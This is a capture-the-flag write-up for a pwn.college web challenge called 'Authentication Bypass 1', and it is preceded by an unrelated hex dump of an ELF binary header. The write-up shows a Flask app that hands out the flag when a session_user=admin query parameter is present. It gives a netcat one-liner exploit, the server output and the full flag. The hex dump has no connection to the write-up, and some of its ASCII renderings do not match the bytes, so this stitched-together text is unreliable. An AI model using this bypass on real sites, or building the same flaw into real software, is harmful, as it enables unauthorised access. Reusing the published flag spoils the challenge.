00000000 7f 45 4c 46 02 01 01 00 00 00 00 00 00 00 00 00 |.ELF............| 00000010 03 00 3e 00 01 00 00 00 60 10 40 00 00 00 00 00 |..>.....`.@.....| 00000020 40 00 00 00 00 00 00 00 48 30 00 00 00 00 00 00 |@.......H0......| 00000030 00 00 00 00 40 00 38 00 09 00 40 00 1a 00 19 00 |....@.8...@.....| 00000040 06 00 00 00 04 00 00 00 40 00 00 00 00 00 00 00 |........@.......| 00000050 40 00 40 00 00 00 00 00 40 00 40 00 00 00 00 00 |@.@.....@.@.....| 00000060 f8 01 00 00 00 00 00 00 f8 01 00 00 00 00 00 00 |................| 00000070 08 00 00 00 00 00 00 00 03 00 00 00 04 00 00 00 |................| 00000080 38 02 00 00 00 00 00 00 38 02 40 00 00 00 00 00 |8.......8.@.....| 00000090 38 02 40 00 00 00 00 00 1c 00 00 00 00 00 00 00 |8.@.............| 000000a0 1c 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 |................| 000000b0 01 00 00 00 05 00 00 00 00 00 00 00 00 00 00 00 |................| 000000c0 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 |..@.......@.....| 000000d0 e4 08 00 00 00 00 00 00 e4 08 00 00 00 00 00 00 |................| 000000e0 00 10 00 00 00 00 00 00 01 00 00 00 06 00 00 00 |................| 000000f0 e8 0d 00 00 00 00 00 00 e8 0d 60 00 00 00 00 00 |........`.@.....| 00000100 e8 0d 60 00 00 00 00 00 48 02 00 00 00 00 00 00 |..`.....H.......| 00000110 50 02 00 00 00 00 00 00 00 10 00 00 00 00 00 00 |P...............| 00000120 02 00 00 00 06 00 00 00 08 0e 00 00 00 00 00 00 |................| 00000130 08 0e 60 00 00 00 00 00 08 0e 60 00 00 00 00 00 |..`.......`.....| 00000140 f0 01 00 00 00 00 00 00 f0 01 00 00 00 00 00 00 |................| 00000150 08 00 00 00 00 00 00 00 04 00 00 00 04 00 00 00 |................| 00000160 54 02 00 00 00 00 00 00 54 02 40 00 00 00 00 00 |T.......T.@.....| 00000170 54 02 40 00 00 00 00 00 44 00 00 00 00 00 00 00 |T.@.....D.......| 00000180 44 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 |D...............| 00000190 51 e5 74 64 06 00 00 00 00 00 00 00 00 00 00 00 |Q.td............| 000001a0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| 000001b0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| 000001c0 08 00 00 00 00 00 00 00 52 e5 74 64 04 00 00 00 |........R.td....| 000001d0 e8 0d 00 00 00 00 00 00 e8 0d 60 00 00 00 00 00 |........`.@.....|

0xKAAAMMUUI

Authentication Bypass 1 — Writeup

Writeup from Web Security

🧠 Challenge Overview

This challenge provides a Flask-based login system backed by a temporary SQLite database. The goal is to log in as the admin user and retrieve the flag.

The login form is handled by a / POST route that validates credentials against a temporary SQLite database. The database is initialized with:

an admin user with a random password
a guest user with password "password"

The main logic of concern:

user = db.execute("SELECT rowid, * FROM users WHERE username = ? AND password = ?", (username, password)).fetchone()

Vulnerability

There is no SQL injection, as the query is parameterized.

However, there’s a critical GET-based bypass:

In the GET route:

@app.route("/", methods=["GET"])
def challenge_get():
    if not (username := flask.request.args.get("session_user", None)):
        ...
    else:
        ...
        if username == "admin":
            page += "<br>Here is your flag: " + open("/flag").read()

The page checks for ?session_user=admin in the GET request, and does not validate if the user has logged in.

So simply accessing: http://challenge.localhost/?session_user=admin will give us the flag directly without authentication!

Exploit

hacker@web-security~authentication-bypass-1:~$ printf 'GET /?session_user=admin HTTP/1.0\r\nHost:challenge.localhost\r\n\r\n' | nc challenge.localhost 80

###Output:

HTTP/1.1 200 OK
Server: Werkzeug/3.0.6 Python/3.8.10
Date: Sun, 20 Jul 2025 06:58:33 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 305
Connection: close

<html><body>Hello, admin!<br>Here is your flag: pwn.college{gxy6127uLKDuVTho5_zxjRrNvrl.QX5gzMzwSM0IzMyEzW}
...

Flag

pwn.college{gxy6127uLKDuVTho5_zxjRrNvrl.QX5gzMzwSM0IzMyEzW}